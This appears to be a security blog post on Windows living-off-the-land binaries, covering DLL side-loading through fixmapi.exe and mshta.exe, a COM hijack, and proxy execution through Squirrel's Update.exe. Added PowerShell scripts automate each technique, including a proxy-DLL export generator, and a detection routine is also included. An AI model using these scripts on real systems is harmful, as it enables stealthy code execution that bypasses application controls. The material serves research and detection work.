A few more LOLBins…

There are a few more quick wins for loading DLLs via native Windows 10 .exe files, courtesy of good ol’ LoadLibraryA calls that pass a bare DLL name (so the application directory is searched first), e.g.:

  • fixmapi.exe
    • Copy c:\WINDOWS\System32\fixmapi.exe to your folder
    • Drop malicious mapistub.dll there
    • Run fixmapi.exe
  • mshta.exe
    • Copy c:\WINDOWS\System32\mshta.exe to your folder
    • Drop malicious WLDP.DLL there
    • Run mshta.exe
  • mshta.exe
    • Temporarily change HKCR\CLSID\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 to point to a malicious DLL
    • Run mshta.exe
    • Restore the Registry entry
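The three procedures above as one script, with the cleanup step built in. This is an added example, not code from the original post: it assumes you have already built a harmless test DLL (passed in as -Payload) whose DllMain does something observable, such as writing a marker file. For the COM variant the override is written under HKCU\Software\Classes rather than HKCR as in the post; HKCR is the merged view of HKLM\Software\Classes and HKCU\Software\Classes, and the per-user branch wins for non-elevated processes, so no admin rights are needed and the HKLM entry is never touched.

```powershell
# Added example (not from the original post). Assumes $Payload is your own
# test DLL; the EXE/DLL pairs come from the post (fixmapi.exe -> mapistub.dll,
# mshta.exe -> WLDP.DLL, mshta.exe -> CLSID {25336920-...} InProcServer32).

# Variants 1 and 2: copy the native EXE next to a DLL it loads by bare name,
# then run it from that directory so the application dir is searched first.
function Invoke-SideLoadTest {
    param(
        [Parameter(Mandatory)][string]$Exe,      # e.g. 'fixmapi.exe'
        [Parameter(Mandatory)][string]$DllName,  # e.g. 'mapistub.dll'
        [Parameter(Mandatory)][string]$Payload,  # path to your test DLL
        [string]$WorkDir = (Join-Path $env:TEMP 'lolbin-test')
    )
    New-Item -ItemType Directory -Path $WorkDir -Force | Out-Null
    Copy-Item -Path (Join-Path $env:SystemRoot "System32\$Exe") -Destination $WorkDir -Force
    Copy-Item -Path $Payload -Destination (Join-Path $WorkDir $DllName) -Force
    $p = Start-Process -FilePath (Join-Path $WorkDir $Exe) -WorkingDirectory $WorkDir -PassThru
    $p.WaitForExit(5000) | Out-Null   # some of these show UI; don't block forever
    return $p
}

# Variant 3: per-user COM hijack of the class mshta.exe instantiates.
# Deviation from the post: HKCU\Software\Classes instead of HKCR (see lead-in).
function Invoke-MshtaClsidTest {
    param([Parameter(Mandatory)][string]$Payload)
    $clsid = '{25336920-03f9-11cf-8fd0-00aa00686f13}'
    $key   = "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32"
    $existed = Test-Path $key
    $orig = if ($existed) { (Get-ItemProperty -Path $key).'(default)' } else { $null }
    try {
        New-Item -Path $key -Force | Out-Null          # -Force creates parent keys
        Set-ItemProperty -Path $key -Name '(default)' -Value $Payload
        Set-ItemProperty -Path $key -Name 'ThreadingModel' -Value 'Apartment'  # as the HKLM entry
        $p = Start-Process -FilePath mshta.exe -PassThru
        $p.WaitForExit(5000) | Out-Null
        return $p
    } finally {
        # "Restore the Registry entry": put back what was there, or remove the override.
        if ($existed) {
            if ($null -ne $orig) { Set-ItemProperty -Path $key -Name '(default)' -Value $orig }
            else { Remove-ItemProperty -Path $key -Name '(default)' -ErrorAction SilentlyContinue }
        } else {
            Remove-Item -Path "HKCU:\Software\Classes\CLSID\$clsid" -Recurse -Force -ErrorAction SilentlyContinue
        }
    }
}

# Usage (paths are placeholders for your own lab files):
# Invoke-SideLoadTest -Exe fixmapi.exe -DllName mapistub.dll -Payload C:\lab\test.dll
# Invoke-SideLoadTest -Exe mshta.exe   -DllName WLDP.DLL     -Payload C:\lab\test.dll
# Invoke-MshtaClsidTest -Payload C:\lab\test.dll
```

The try/finally is the point: the COM variant is only "temporary" if the restore runs even when mshta.exe fails to start, and writing under HKCU keeps the change scoped to the test user.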

This is obviously not the end.

There are so many possibilities that enumerating them all gets really boring:

  • Apart from LoadLibraryA, there is LoadLibraryW, which is just as prevalent.
  • There are cases of LoadLibraryExA and LoadLibraryExW called with flags that do not restrict the search path, so they can be abused the same way.
  • There are also functions that resolve library paths from environment variables, a bad choice.
  • Pretty much every .exe whose import table references DLLs that are not on the KnownDLLs list may be used as a lolbin, e.g.:
    • certutil.exe relies on certcli.dll
      • certcli.dll in turn relies on certca.dll
    so you can just produce DLLs that export the same function names as the originals and let certutil.exe load them.
  • And there are non-OS binaries that are highly prevalent in various environments and offer lots of opportunities for side-loading or proxy execution.
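The "produce DLLs that export the same functions as the originals" step done mechanically. This is an added example, not code from the post or a Microsoft tool: a minimal PE export-directory parser that reads a DLL from the local System32 (no sample file is embedded) and emits MSVC /EXPORT:name=module.name forwarding pragmas for a proxy DLL. The renamed-original naming (certcli_orig.dll) is an assumption for illustration; certutil.exe/certcli.dll is the post's own example.

```powershell
# Added example (not from the original post). Parses IMAGE_EXPORT_DIRECTORY
# of a PE file and generates linker pragmas so a proxy DLL of the same name
# re-exports every named function by forwarding it to the renamed original.
function Get-PeExports {
    param([Parameter(Mandatory)][string]$Path)
    $b   = [System.IO.File]::ReadAllBytes($Path)
    $u16 = { param($o) [BitConverter]::ToUInt16($b, $o) }
    $u32 = { param($o) [BitConverter]::ToUInt32($b, $o) }

    $pe = & $u32 0x3C                                            # e_lfanew
    if ((& $u32 $pe) -ne 0x00004550) { throw "$Path is not a PE image" }   # 'PE\0\0'
    $nSections = & $u16 ($pe + 6)                                # IMAGE_FILE_HEADER.NumberOfSections
    $optSize   = & $u16 ($pe + 20)                               # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    $opt       = $pe + 24                                        # IMAGE_OPTIONAL_HEADER
    $dirOff    = if ((& $u16 $opt) -eq 0x20B) { 112 } else { 96 }   # DataDirectory offset: PE32+ vs PE32
    $exportRva = & $u32 ($opt + $dirOff)                         # export directory RVA
    if ($exportRva -eq 0) { return }

    # Section table, needed to translate RVAs into file offsets.
    $sections = for ($i = 0; $i -lt $nSections; $i++) {
        $s = $opt + $optSize + 40 * $i
        [pscustomobject]@{
            VA   = & $u32 ($s + 12)
            Size = [Math]::Max([uint32](& $u32 ($s + 8)), [uint32](& $u32 ($s + 16)))
            Raw  = & $u32 ($s + 20)
        }
    }
    $toOffset = {
        param($rva)
        foreach ($s in $sections) {
            if ($rva -ge $s.VA -and $rva -lt ($s.VA + $s.Size)) { return $rva - $s.VA + $s.Raw }
        }
        throw ('RVA 0x{0:X} is outside every section' -f $rva)
    }

    $ed     = & $toOffset $exportRva                             # IMAGE_EXPORT_DIRECTORY
    $base   = & $u32 ($ed + 16)                                  # ordinal base
    $nNames = & $u32 ($ed + 24)                                  # NumberOfNames
    $names  = & $toOffset (& $u32 ($ed + 32))                    # AddressOfNames
    $ords   = & $toOffset (& $u32 ($ed + 36))                    # AddressOfNameOrdinals
    for ($i = 0; $i -lt $nNames; $i++) {
        $nameOff = & $toOffset (& $u32 ($names + 4 * $i))
        $end     = [Array]::IndexOf($b, [byte]0, [int]$nameOff)  # NUL-terminated ASCII name
        [pscustomobject]@{
            Name    = [Text.Encoding]::ASCII.GetString($b, $nameOff, $end - $nameOff)
            Ordinal = (& $u16 ($ords + 2 * $i)) + $base
        }
    }
}

function New-ProxyExportPragmas {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$ForwardTo   # module the proxy forwards to; default <name>_orig (assumed naming)
    )
    if (-not $ForwardTo) { $ForwardTo = [IO.Path]::GetFileNameWithoutExtension($Path) + '_orig' }
    # One line per named export, shape: /export:Foo=certcli_orig.Foo,@1
    foreach ($e in Get-PeExports -Path $Path) {
        "#pragma comment(linker, `"/export:$($e.Name)=$ForwardTo.$($e.Name),@$($e.Ordinal)`")"
    }
}

# Usage: include the output in the proxy's source, build it as certcli.dll
# (same architecture as the original), and drop it next to a copied
# certutil.exe together with the original renamed to certcli_orig.dll.
# New-ProxyExportPragmas "$env:SystemRoot\System32\certcli.dll" | Set-Content -Encoding ASCII exports.h
```

Only named exports are covered: functions exported by ordinal alone (NONAME) are not in the name table, so if the importing binary links to one of those the proxy needs it added by hand. The same generator works for the next hop (certca.dll) when the proxied DLL itself has to keep working.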

The possibilities are almost endless. Unless I find something really new/cool I won’t be posting about Lolbins anymore as at this stage I am bored with it 🙂

Squirrel as a Lolbin

Squirrel is an installation and update framework for Windows desktop apps. It is used by many applications (e.g. Slack) and as a result can be found on many systems. Like other installers I described previously, Squirrel includes a bunch of components / routines that simplify typical installation tasks, which makes it a good candidate for a lolbin.

The simplest way to use a Squirrel component as a lolbin is to copy a test executable into the application directory of an installed application and then run Update.exe with the ‘--processStart’ command line argument.

I will use Slack as an example, but it can be any application really.

  • Go to c:\Users\<user>\AppData\Local\slack\
  • Find the folder where the application files are, e.g. app-3.3.0\
  • Drop your test.exe there
  • Now run ‘Update.exe --processStart test.exe’ (Update.exe sits in the slack\ folder, one level above app-3.3.0\)

That’s it. The test.exe should be executed.
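The walkthrough above as a function, together with the inverse check a defender would run. This is an added example, not from the post and not part of Squirrel; it assumes the standard Squirrel layout the post describes (%LOCALAPPDATA%\<app>\Update.exe with app-<version>\ subfolders) plus a packages\RELEASES file, which the check uses to recognise a Squirrel install. The test executable you pass in is your own.

```powershell
# Added example (not from the original post, not part of Squirrel).

# Tester side: drop the executable into the newest app-* folder and let
# Update.exe launch it. Per Update.exe's own help, --processStart starts the
# executable "in the latest version of the app package", so the copy must
# land in the highest-versioned app-* directory.
function Invoke-SquirrelProcessStart {
    param(
        [string]$AppDir = (Join-Path $env:LOCALAPPDATA 'slack'),
        [Parameter(Mandatory)][string]$TestExe,
        [string]$Arguments = ''
    )
    $latest = Get-ChildItem -Path $AppDir -Directory -Filter 'app-*' |
        Sort-Object { [version](($_.Name -replace '^app-', '') -replace '-.*$', '') } -Descending |
        Select-Object -First 1
    if (-not $latest) { throw "No app-* directory under $AppDir" }
    Copy-Item -Path $TestExe -Destination $latest.FullName -Force
    $argList = @('--processStart', (Split-Path $TestExe -Leaf))
    if ($Arguments) { $argList += @('--process-start-args', $Arguments) }
    # Update.exe lives one level above the app-* folders.
    Start-Process -FilePath (Join-Path $AppDir 'Update.exe') -ArgumentList $argList -PassThru
}

# Defender side: find Squirrel installs under the profile and list every .exe
# in their app-* folders that is unsigned or signed by a different publisher
# than that install's Update.exe. A dropped test.exe shows up as NotSigned.
# Expect some benign noise from helper tools that vendors ship unsigned.
function Find-SquirrelForeignExecutables {
    param([string]$Root = $env:LOCALAPPDATA)
    foreach ($app in Get-ChildItem -Path $Root -Directory -ErrorAction SilentlyContinue) {
        $updater = Join-Path $app.FullName 'Update.exe'
        if (-not (Test-Path $updater)) { continue }
        if (-not (Test-Path (Join-Path $app.FullName 'packages\RELEASES'))) { continue }
        $vendor = (Get-AuthenticodeSignature -FilePath $updater).SignerCertificate.Subject
        foreach ($dir in Get-ChildItem -Path $app.FullName -Directory -Filter 'app-*') {
            foreach ($exe in Get-ChildItem -Path $dir.FullName -Recurse -File -Filter '*.exe') {
                $sig    = Get-AuthenticodeSignature -FilePath $exe.FullName
                $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
                if ($sig.Status -ne 'Valid' -or $signer -ne $vendor) {
                    [pscustomobject]@{
                        App    = $app.Name
                        Path   = $exe.FullName
                        Status = $sig.Status
                        Signer = $signer
                    }
                }
            }
        }
    }
}

# Usage (paths are placeholders):
# Invoke-SquirrelProcessStart -TestExe C:\lab\test.exe -Arguments 'hello'
# Find-SquirrelForeignExecutables | Format-Table -AutoSize
```

The check keys on the signer of Update.exe rather than a hard-coded vendor list, so it applies to any Squirrel-based app, not just Slack; pairing it with process-creation telemetry where the parent is Update.exe catches the --processStart case at run time as well.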

There are alternatives: one could prepare a NuGet installation package and use the update process to download it from the internet and run it.

Below is a full list of arguments that the tool supports (including the semi-documented ones, i.e. those that are not listed when --help is used as a command line argument):

Commands:
--install=VALUE - Install the app whose package is in the specified directory
--uninstall - Uninstall the app in the same dir as Update.exe
--download=VALUE - Download the releases specified by the URL and write new results to stdout as JSON
--checkForUpdate=VALUE - Check for one available update and write new results to stdout as JSON
--update=VALUE - Update the application to the latest remote version specified by URL
--releasify=VALUE - Update or generate a releases directory with a given NuGet package
--createShortcut=VALUE - Create a shortcut for the given executable name
--removeShortcut=VALUE - Remove a shortcut for the given executable name
--updateSelf=VALUE - Copy the currently executing Update.exe into the default location
--processStart=VALUE - Start an executable in the latest version of the app package
--processStartAndWait=VALUE - Start an executable in the latest version of the app package (and wait for it to exit)
Options:
-h, -?, --help - Display Help and exit
-r, --releaseDir=VALUE - Path to a release directory to use with releasify
-p, --packagesDir=VALUE - Path to the NuGet Packages directory for C# apps
--bootstrapperExe=VALUE - Path to the Setup.exe to use as a template
-g, --loadingGif=VALUE - Path to an animated GIF to be displayed during installation
-i, --icon=VALUE - Path to an ICO file that will be used for icon shortcuts
--setupIcon=VALUE - Path to an ICO file that will be used for the Setup executable's icon
-n, --signWithParams=VALUE - Sign the installer via SignTool.exe with the parameters given
-b, --baseUrl=VALUE - Provides a base URL to prefix the RELEASES file packages with
-a, --process-start-args=VALUE - Arguments that will be used when starting the executable
-s, --silent - Silent install
-l, --shortcut-locations=VALUE - Comma-separated string of shortcut locations, e.g. 'Desktop,StartMenu'
--no-msi - Don't generate an MSI package